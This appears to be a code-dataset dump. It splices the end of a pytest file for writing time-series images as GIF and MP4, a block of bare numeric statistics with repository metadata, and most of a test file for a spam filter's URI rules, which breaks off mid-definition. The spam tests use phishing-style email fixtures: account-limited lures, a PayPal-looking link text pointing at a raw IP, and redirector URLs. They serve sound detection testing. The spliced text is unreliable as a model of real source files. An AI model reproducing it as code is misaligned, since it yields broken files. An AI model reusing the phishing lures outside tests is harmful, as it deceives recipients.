@pytest.mark.parametrize("filename", ["e.gif"])
def test_timeseries_writer(
    array_constructor: Callable,
    write_shape: Tuple[int, ...],
    write_dim_order: str,
    read_shape: Tuple[int, ...],
    read_dim_order: str,
    filename: str,
) -> None:
    """Round-trip a time-series array through TimeseriesWriter as a GIF.

    Saves an array of *write_shape* (optionally with an explicit
    *write_dim_order*), reads it back with DefaultReader, and checks the
    resulting shape and dimension order.
    """
    # Create array
    arr = array_constructor(write_shape, dtype=np.uint8)
    # Construct save end point
    save_uri = get_resource_write_full_path(filename, LOCAL)
    # Normal save
    TimeseriesWriter.save(arr, save_uri, write_dim_order)
    # Read written result and check basics
    reader = DefaultReader(save_uri)
    # Check basics
    assert reader.shape == read_shape
    assert reader.dims.order == read_dim_order

# Can't do "easy" testing because compression + shape mismatches on RGB data
@array_constructor
@pytest.mark.parametrize(
    "write_shape, write_dim_order, read_shape, read_dim_order",
    [
        # We use 112 instead of 100 because FFMPEG block size warnings are annoying
        ((30, 112, 112), None, (30, 112, 112, 3), "TYXS"),
        # Note that files get saved out with RGBA, instead of just RGB
        ((30, 112, 112, 3), None, (30, 112, 112, 3), "TYXS"),
        ((112, 30, 112), "XTY", (30, 112, 112, 3), "TYXS"),
        # Note that files get saved out with RGBA, instead of just RGB
        ((3, 112, 30, 112), "SYTX", (30, 112, 112, 3), "TYXS"),
        # Invalid shapes / dim orders below must raise.
        pytest.param(
            (1, 1),
            None,
            None,
            None,
            marks=pytest.mark.raises(exception=exceptions.UnexpectedShapeError),
        ),
        pytest.param(
            (1, 1, 1, 1, 1),
            None,
            None,
            None,
            marks=pytest.mark.raises(exception=exceptions.UnexpectedShapeError),
        ),
        pytest.param(
            (1, 1, 1, 1, 1, 1),
            "STCZYX",
            None,
            None,
            marks=pytest.mark.raises(exception=exceptions.UnexpectedShapeError),
        ),
        pytest.param(
            (1, 1, 1, 1),
            "ABCD",
            None,
            None,
            marks=pytest.mark.raises(
                exception=exceptions.InvalidDimensionOrderingError
            ),
        ),
    ],
)
@pytest.mark.parametrize("filename", ["f.mp4"])
def test_timeseries_writer_ffmpeg(
    array_constructor: Callable,
    write_shape: Tuple[int, ...],
    write_dim_order: str,
    read_shape: Tuple[int, ...],
    read_dim_order: str,
    filename: str,
) -> None:
    """Round-trip a time-series array through TimeseriesWriter as MP4.

    Same structure as test_timeseries_writer, but writes via FFMPEG; the
    expected read shapes account for the codec always producing RGB.
    """
    # Create array
    arr = array_constructor(write_shape, dtype=np.uint8)
    # Construct save end point
    save_uri = get_resource_write_full_path(filename, LOCAL)
    # Catch invalid save
    # if host == REMOTE:
    #     with pytest.raises(IOError):
    #         TimeseriesWriter.save(arr, save_uri, write_dim_order)
    #     return
    # Normal save
    TimeseriesWriter.save(arr, save_uri, write_dim_order)
    # Read written result and check basics
    reader = DefaultReader(save_uri)
    # Check basics
    assert reader.shape == read_shape
    assert reader.dims.order == read_dim_order
    # Can't do "easy" testing because compression + shape mismatches on RGB data
| 29.839506
| 83
| 0.586057
| 564
| 4,834
| 4.897163
| 0.216312
| 0.018827
| 0.019551
| 0.017379
| 0.809196
| 0.789283
| 0.78168
| 0.78168
| 0.766112
| 0.766112
| 0
| 0.053687
| 0.298717
| 4,834
| 161
| 84
| 30.024845
| 0.761062
| 0.176665
| 0
| 0.803419
| 0
| 0
| 0.051062
| 0
| 0
| 0
| 0
| 0
| 0.034188
| 1
| 0.017094
| false
| 0
| 0.059829
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b97a762e174387930091872ed29f46fafd9ea2c2
| 31,989
|
py
|
Python
|
tests/functional/test_plugins/test_uri_eval.py
|
Worteks/OrangeAssassin
|
21baf0b84fbedd887f6d88e13c624f14fb0b5e06
|
[
"Apache-2.0"
] | null | null | null |
tests/functional/test_plugins/test_uri_eval.py
|
Worteks/OrangeAssassin
|
21baf0b84fbedd887f6d88e13c624f14fb0b5e06
|
[
"Apache-2.0"
] | null | null | null |
tests/functional/test_plugins/test_uri_eval.py
|
Worteks/OrangeAssassin
|
21baf0b84fbedd887f6d88e13c624f14fb0b5e06
|
[
"Apache-2.0"
] | null | null | null |
"""Functional tests for URIEval Plugin"""
from __future__ import absolute_import
import random
import sys
import unittest
from string import ascii_letters
from string import digits
import tests.util
# Load plugin and report matched RULES and SCORE
PRE_CONFIG = """
loadplugin oa.plugins.uri_eval.URIEvalPlugin
report _SCORE_
report _TESTS_
"""
# Define rules for plugin
CONFIG = """
body CHECK_FOR_HTTP_REDIRECTOR eval:check_for_http_redirector()
body CHECK_HTTPS_IP_MISMATCH eval:check_https_ip_mismatch()
body CHECK_URI_TRUNCATED eval:check_uri_truncated()
"""
class TestFunctionalURIEval(tests.util.TestBase):
"""Class containing functional tests for the URI Plugin"""
mytext = [random.choice(ascii_letters + digits) for _ in range(8182)]
long_text = "".join(mytext)
def test_check_for_http_redirector(self):
    """A redirector URL (http...url=https://...) in a plain body matches."""
    email = """From: sender@example.com
\nhttp://utility.baidu.com/traf/click.php?id=215&url=https://log0.wordpress.com"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])

def test_check_for_http_redirector_in_a_label_closed_commas(self):
    """Redirector inside a quoted <a href="..."> attribute matches."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://utility.baidu.com/traf/click.php?id=215&url=https://log0.wordpress.com"></a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])

@unittest.skipIf(sys.version_info.major == 3 and sys.version_info.minor < 3,
                 'Incompatible with python 3.2.*')
def test_check_for_http_redirector_in_a_label_no_commas(self):
    """Redirector in an unquoted href attribute matches (py >= 3.3)."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href=http://utility.baidu.com/traf/click.php?id=215&url=https://log0.wordpress.com></a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])

def test_check_for_http_redirector_links_combined(self):
    """Redirector matches even without '=' between param and target URL."""
    email = """From: sender@example.com
\nhttp://utility.baidu.com/traf/click.php?id=215&urlhttps://log0.wordpress.com"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])

def test_check_for_http_redirector_no_http(self):
    """Target without a scheme name (://...) does not match."""
    email = """From: sender@example.com
\nhttp://utility.baidu.com/traf/click.php?id=215&url=://log0.wordpress.com"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 0, [])

def test_check_for_http_redirector_with_ftp(self):
    """An ftp:// target is not treated as a redirector."""
    email = """From: sender@example.com
\nhttp://utility.baidu.com/traf/click.php?id=215&url=ftp://log0.wordpress.com"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 0, [])

def test_check_for_http_redirector_only_http(self):
    """A bare https:// target with no host does not match."""
    email = """From: sender@example.com
\nhttp://utility.baidu.com/traf/click.php?id=215&url=https://"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 0, [])

def test_check_for_http_redirector_incomplete_link(self):
    """A target with an incomplete hostname still matches."""
    email = """From: sender@example.com
\nhttp://utility.baidu.com/traf/click.php?id=215&url=https://ceva"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])

def test_check_for_http_redirector_different_links(self):
    """A space before the target makes them separate links: no match."""
    email = """From: sender@example.com
\nhttp://utility.baidu.com/traf/click.php?id=215&url= https://ceva.com"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 0, [])

def test_check_for_http_redirector_middle_of_body(self):
    """A redirector buried in the middle of body text matches."""
    email = """From: sender@example.com
\nFYI, this week is Learning Week @LinkedIn, so if you are interested in taking some free courses, hurry up
asfglajds;galsg a;slfa;sl laddg http://utility.baidu.com/traf/click.php?id=215&url=https://ceva.com asdgksal;fjlaskfdghs"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_https_ip_mismatch(self):
    """IP href with https domain label plus a redirector: both rules fire."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited http://utility.baidu.com/traf/click.php?id=215&url=https://log0.wordpress.com:
<a href="http://45.42.12.12/login/account-unlock">https://www.paypal.com/login/account-unlock</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 2, ['CHECK_HTTPS_IP_MISMATCH', 'CHECK_FOR_HTTP_REDIRECTOR'])

def test_check_for_https_ip_mismatch_and_redirector_in_a_label(self):
    """Domain-based redirector in an <a> href: only the redirector fires."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://google.com=https://log0.wordpress.com/">https://ceva.com/</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])

def test_check_for_https_ip_mismatch_and_redirector_in_a_label_with_invalid_expression(self):
    """An @-prefixed IP in the href is invalid for mismatch: redirector only."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://@1.2.3.4=https://log0.wordpress.com/">https://ceva.com/</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])

def test_check_for_https_ip_mismatch_and_redirector_in_a_label_ip_left(self):
    """Valid IP href redirecting to an https domain: both rules fire."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/https://log0.wordpress.com/">https://ceva.com/</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 2, ['CHECK_HTTPS_IP_MISMATCH', 'CHECK_FOR_HTTP_REDIRECTOR'])

def test_check_for_https_ip_mismatch_and_redirector_in_link_label_same_address(self):
    """<link> redirecting to the same address is not flagged."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<link rel=parent href="http://log0.wordpress.com/https://log0.wordpress.com/">
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 0, [])

def test_check_for_https_ip_mismatch_and_redirector_in_link_label(self):
    """Redirector inside a <link> href matches; no IP so no mismatch."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<link rel=parent href="http://google.com=https://log0.wordpress.com/">https://ceva.com/
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])

def test_check_for_https_ip_mismatch_and_redirector_in_link_label_with_invalid_expression(self):
    """@-prefixed IP in a <link> href: redirector only."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<link rel=parent href="http://@1.2.3.4=https://log0.wordpress.com/">https://ceva.com/
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])

def test_check_for_https_ip_mismatch_and_redirector_in_link_label_ip_left(self):
    """IP redirector in a <link> tag: redirector fires, mismatch does not."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<link rel=parent href="http://1.2.3.4=https://log0.wordpress.com/">https://ceva.com/
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_https_ip_mismatch_domains(self):
    """Domain href with matching https label: no mismatch."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://google.com/">https://www.google.com/</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 0, [])

def test_check_for_https_ip_mismatch_domains_incomplete_right(self):
    """Incomplete https hostname in the label: no mismatch."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://google.com/"> cevatest https://ceva/</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 0, [])

def test_check_for_https_ip_mismatch_ip_right(self):
    """IP only in the label (not the href): no mismatch."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://google.com/">http://300.58.209.206/</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 0, [])

def test_check_for_https_ip_mismatch_both_ips(self):
    """IP in both href and label: no mismatch (no https domain claimed)."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://5.79.73.204/">http://300.58.209.206/</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 0, [])

def test_check_for_https_ip_mismatch_incomplete_domain(self):
    """IP href with an https label (even an incomplete domain): mismatch."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://5.79.73.204/">https://ceva/</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 1, ['CHECK_HTTPS_IP_MISMATCH'])

def test_check_for_https_ip_mismatch_ipv6_left(self):
    """IPv6 href with an IP label: no mismatch."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://2001:1af8:4700:a02d:2::1/">https://1.2.3.4/</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 0, [])

def test_check_for_https_ip_mismatch_ipv6_left_domain_right(self):
    """IPv6 href with an https domain label: mismatch."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://2001:1af8:4700:a02d:2::1/">https://yahoo.com/</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 1, ['CHECK_HTTPS_IP_MISMATCH'])

def test_check_for_https_ip_mismatch_ipv6_left_multiple_labels(self):
    """Mismatch reported once even across multiple anchors."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://2001:1af8:4700:a02d:2::1/">https://1.2.3.4/</a>
<a href="http://2001:1af8:4700:a02d:2::1/">https://yahoo.com/</a>
<a href="http://2001:1af8:4700:a02d:2::1/">https://6.6.6.6/</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 1, ['CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_https_ip_mismatch_ipv6_with_redirector(self):
    """IPv6 redirector href plus domain label: both rules fire."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://2001:1af8:4700:a02d:2::1/https://test">https://1.2.3.4/</a>
<a href="http://2001:1af8:4700:a02d:2::1/">https://yahoo.com/</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 2, ['CHECK_HTTPS_IP_MISMATCH', 'CHECK_FOR_HTTP_REDIRECTOR'])

def test_check_for_https_ip_mismatch_ipv6_with_redirector_and_link_label(self):
    """Same as above with an extra <link> tag: still one hit per rule."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://2001:1af8:4700:a02d:2::1/https://test">https://1.2.3.4/</a>
<a href="http://2001:1af8:4700:a02d:2::1/">https://yahoo.com/</a>
<link href="http://2001:1af8:4700:a02d:2::1/">https://yahoo.com/
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 2, ['CHECK_HTTPS_IP_MISMATCH', 'CHECK_FOR_HTTP_REDIRECTOR'])

def test_check_for_https_ip_mismatch_ipv6_with_false_redirector(self):
    """Redirect target equal to the source IPv6: redirector not flagged."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://2001:1af8:4700:a02d:2::1/https://2001:1af8:4700:a02d:2::1">https://1.2.3.4/</a>
<a href="http://2001:1af8:4700:a02d:2::1/">https://yahoo.com/</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 1, ['CHECK_HTTPS_IP_MISMATCH'])

def test_check_for_https_ip_mismatch_incorrect_ipv4_domain_right(self):
    """Truncated IPv6 in the href is not a valid IP: no rules fire."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://2001:1af8:4700:a02d/https://2001:1af8:4700:a02d/">https://yahoo.com/</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 0, [])

def test_check_for_https_ip_mismatch_no_domain(self):
    """IP href with a bare https:// label still counts as a mismatch."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/">https://</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 1, ['CHECK_HTTPS_IP_MISMATCH'])

def test_check_for_https_ip_mismatch_incorrect_ip(self):
    """A three-octet 'IP' is not a valid IP: no mismatch."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3/">https://</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 0, [])

def test_check_for_https_ip_mismatch_unfinished_ip(self):
    """A trailing-dot IP (1.2.3.) is not a valid IP: no mismatch."""
    email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3./">https://</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    result = self.check_pad(email)
    self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_inverted_commas_16_ip(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.'2'.3.4/">https://test.com</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_inverted_commas_ip_right(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/">https://'1'.2.3.4</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_https_ip_mismatch_inverted_commas_on_all_ip(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://'1.2.3.4'/">https://test.com</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_invalid_expression_ip(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://@1.2.3.4/">https://test.com</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_ipv6_right(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/">https://2001:1af8:4700:a02d:2::1/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_same_ipv6_right_and_left(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://2001:1af8:4700:a02d:2::1/">https://2001:1af8:4700:a02d:2::1/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_same_ipv6_right_and_left_with_redirector(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://2001:1af8:4700:a02d:2::1/https://2901:1af8:4711:a02d:2::1">https://2901:1af8:4711:a02d:2::1/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_https_ip_mismatch_same_ipv6_right_and_left_with_redirector_negative(self):
    """A redirect to the same IPv6 host is not treated as a redirector hit."""
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://2001:1af8:4700:a02d:2::1/https://2001:1af8:4700:a02d:2::1/">https://2901:1af8:4711:a02d:2::1/</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 0, [])
def test_check_for_https_ip_mismatch_text_between_links_domain_right(self):
    """Extra text before a domain-style visible URL still yields a mismatch hit."""
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/"> cevatest https://google.com/</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 1, ['CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_https_ip_mismatch_text_between_links_ip_right(self):
    """Extra text before an IP-style visible URL does not yield a mismatch hit."""
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/"> cevatest https://1.2.3.4/</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 0, [])
def test_check_for_https_ip_mismatch_with_multiple_uri(self):
    """A second, domain-style URL in the link text triggers the mismatch rule."""
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/"> cevatest https://1.2.3.4/ https://test.com/</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 1, ['CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_redirector_with_multiple_redirector(self):
    """Several chained redirects to a different domain fire the redirector rule once."""
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/https://1.2.3.4/https://test.com/https://1.2.3.4/"> cevatest https://1.2.3.4/</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 1, ['CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_redirector_with_multiple_redirector_negative(self):
    """Chained redirects that always land on the same IP are not flagged."""
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/https://1.2.3.4/https://1.2.3.4/"> cevatest https://1.2.3.4/</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 0, [])
def test_check_for_https_ip_mismatch_label_not_closed(self):
    """An unterminated <a> element is still parsed and the mismatch detected."""
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/">https://google
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 1, ['CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_https_ip_mismatch_incorrect_link_label(self):
    """A <link> element (no anchor text semantics) must not produce a mismatch."""
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<link href="http://1.2.3.4/">https://google.com/</link>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 0, [])
def test_check_for_https_ip_mismatch_multiple_labels_redirector_in_link_label(self):
    """A redirector inside a <link> href fires even among IP-only anchors."""
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/">https://5.5.5.5/</a>
<link href="http://1.2.3.4/https://google.com/">
<a href="http://1.2.3.4/">https://6.6.6.6/</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 1, ['CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_https_ip_mismatch_multiple_labels_match_on_a(self):
    """Mismatch is detected on the <a> element; trailing <link> text is ignored."""
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/">https://google.com/</a>
<link href="http://1.2.3.4/">https://test.com/
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 1, ['CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_https_ip_mismatch_multiple_labels_match_on_both(self):
    """Mismatch on the anchor plus a redirector in the <link> fire both rules."""
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/">https://google.com/</a>
<link href="http://1.2.3.4/https://test.com/">
<a href="http://6.6.6.6/"></a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 2, ['CHECK_HTTPS_IP_MISMATCH', 'CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_https_ip_mismatch_multiple_labels(self):
    """Only the anchor whose text is a domain (middle one) produces a hit."""
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/">https://5.5.5.5/</a>
<a href="http://1.2.3.4/">https://google.com/</a>
<a href="http://1.2.3.4/">https://6.6.6.6/></a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 1, ['CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_https_ip_mismatch_multiple_labels_match_last(self):
    """The mismatch is found when the offending anchor is the last one."""
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/">https://5.5.5.5/</a>
<a href="http://1.2.3.4/">https://google.com/</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 1, ['CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_https_ip_mismatch_multiple_labels_match_first(self):
    """The mismatch is found when the offending anchor is the first one."""
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
<a href="http://1.2.3.4/">https://google.com/</a>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/">https://5.5.5.5/</a>
<a href="http://1.2.3.4/">https://1.2.3.4./</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 1, ['CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_uri_truncated_negative(self):
